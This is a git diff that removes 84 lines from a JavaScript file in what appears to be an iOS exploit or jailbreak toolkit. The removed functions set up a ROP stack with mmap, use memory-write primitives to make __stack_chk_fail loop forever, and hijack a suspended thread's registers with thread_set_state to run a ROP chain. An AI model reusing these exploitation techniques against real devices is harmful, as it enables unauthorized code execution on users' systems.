diff options
| -rw-r--r-- | src/js/primitives/call.js | 84 |
1 files changed, 0 insertions, 84 deletions
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js index 74a20d8..6d4ced6 100644 --- a/src/js/primitives/call.js +++ b/src/js/primitives/call.js @@ -330,88 +330,4 @@ function scall() { } return call4arg.apply(this, args_to_pass); } -} - -function rop_init() { - stack_shit_rop = scall("mmap", 0, 0x1000000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0); -} - -function exec_rop(buf) { - /* - * setup ptrs - */ - write_u32(countptr, count); - write_u32(thptr, th); - write_u32(threadptr, thread); - write_u32(thread_stateptr, thread_state); - - write_u32(countptrptr, countptr); - write_u32(thptrptr, thptr); - write_u32(threadptrptr, threadptr); - write_u32(thread_stateptrptr, thread_stateptr); - - var dyld_shc_slide = get_dyld_shc_slide(); - - /* - * make __stack_chk_fail infinite loop - * (works by setting its lazy addy to its resolver, thus the resolver just - * endlessly jumps to iself) - */ - write_u32(__stack_chk_fail_lazy_addy + dyld_shc_slide, __stack_chk_fail_resolver + dyld_shc_slide); - - if (stack_shit_rop == 0) { - rop_init(); - } - - calls4arg("printf", sptr("%x %x\n"), 0, stack_shit_rop, 0); - - /* - * if the thread doesn't exist, create it. - */ - calls4arg("pthread_create", threadptr, 0, __stack_chk_fail_resolver + dyld_shc_slide, 0); - thread = read_u32(threadptr); - write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0)); - rth = read_u32(th); - calls4arg("thread_suspend", rth, 0, 0, 0); - - if (pthread_ret == 0) { - pthread_ret = malloc(4); - } - - write_u32_buf(stack_shit_rop + 0x3c, buf, buf.length * 4); - - /* - - var stack_shit_ret_offset = 0x58; - - write_u32(stack_shit + stack_shit_ret_offset, pthread_exit + dyld_shc_slide); - */ - - /* - * stack - */ - write_u32(thread_state + (13 << 2), stack_shit_rop); - - /* - * pc - */ - write_u32(thread_state + (15 << 2), add_sp_0x3c + dyld_shc_slide); - - /* - * cpsr, magic - */ - write_u32(thread_state + (16 << 2), 0x40000020); - - printf("actually doing it\n"); - - /* - * set the state - */ - calls4arg("thread_set_state", rth, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT); - calls4arg("thread_resume", rth, 0, 0, 0); - - calls4arg("pthread_join", thread, pthread_ret, 0, 0); - write_u32(count, 17); - calls4arg("thread_get_state", rth, ARM_THREAD_STATE, thread_state, count); - return read_u32(pthread_ret); }
\ No newline at end of file |